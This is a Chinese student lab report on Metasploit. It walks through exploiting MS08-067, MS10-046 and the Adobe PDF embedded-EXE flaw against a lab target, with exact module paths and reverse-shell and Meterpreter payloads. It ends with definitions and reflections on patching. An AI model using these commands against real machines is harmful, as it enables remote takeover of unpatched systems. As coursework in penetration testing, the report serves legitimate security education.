
主动攻击:ms08_067漏洞攻击
启用msf终端
msfconsole
然后使用search命令搜索该漏洞对应的模块:search ms08_067
选择输入
use exploit/windows/smb/ms08_067_netapi
,之后查看信息:show payloads
,选择攻击载荷set payload generic/shell_reverse_tcp
查看配置渗透攻击所需的配置项
show options
,查看渗透攻击模块所能成功渗透攻击的目标平台show targets
根据目标情况配置渗透攻击的各个选项
回连成功,进行相关命令测试
对浏览器攻击:ms10_046漏洞攻击
基本步骤同上,先利用指令
search ms10_046
找到可以攻击的模块我们这里选择第一个,输入命令
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
输入
show payloads
选择攻击载荷,我们选择generic/shell_reverse_tcp
,输入命令set payload generic/shell_reverse_tcp
使用根据目标情况配置渗透攻击的各个选项,输入命令
show options
查看配置设置并进行修改输入
exploit
执行可以看到生成了所需的URL,在靶机浏览器访问后,kal得到相应但没有出现预期效果
对配置进行修改,选用
set payload windows/meterpreter/reverse_tcp
,设置后查看结果,输入sessions
查看到一个ID号为1的会话使用
sessions -i 1
选择会话1,成功获取了靶机的shell,利用systeminfo
指令查看靶机的系统信息
对Adobe的漏洞攻击:adobe_pdf_embedded_exe
输入
search adobe
查询和adobe漏洞有关的模块,我选择exploit/windows/fileformat/adobe_pdf_embedded_exe
选择攻击载荷payload,这里我选
windows/meterpreter/reverse_tcp
输入命令
set payload windows/meterpreter/reverse_tcp
使用攻击载荷根据目标情况配置渗透攻击的各个选项
执行,查看结果
- 可以看到在相应目的生成了
evil.pdf
,我们来将它发送到靶机 输入相关命令打开监听
回连成功,输入命令查看系统信息
辅助模块的应用:scanner/http/options,功能Display available HTTP options for each system
- 输入命令
show auxiliary
查看辅助模块,并挑选使用scanner/http/options
- 输入命令
use scanner/http/options
,输入info
查看信息 设置参数
exploit
执行
基础问题回答
- 用自己的话解释什么是exploit,payload,encode.
exploit
是漏洞利用,我们执行exploit后,我们所运送的程序或代码就开始去寻找漏洞,并控制它为我们服务。payload
是有效载荷,在我们执行exploit后,谁来运送程序或代码呢?这个payload就是关键的一个环节。encode
是编码,对我们的程序或代码进行伪装,使其避免被查收。
实验体会
通过本次实验,使我加深了对平时计算机下补丁的意识,本次实验是让我们知道如何根据特定漏洞去攻击特定系统,一个漏洞只能攻击没有装相应补丁的系统,可想而知漏洞的重要性,如果漏洞被发现,而没有装补丁,我们的系统就赤裸裸的暴露在黑客手下,而我们却毫不自知,所以我们要及时安装补丁,要养成网络安全意识,尽可能避免病毒、木马的入侵,提高专业知识,掌握相应技能。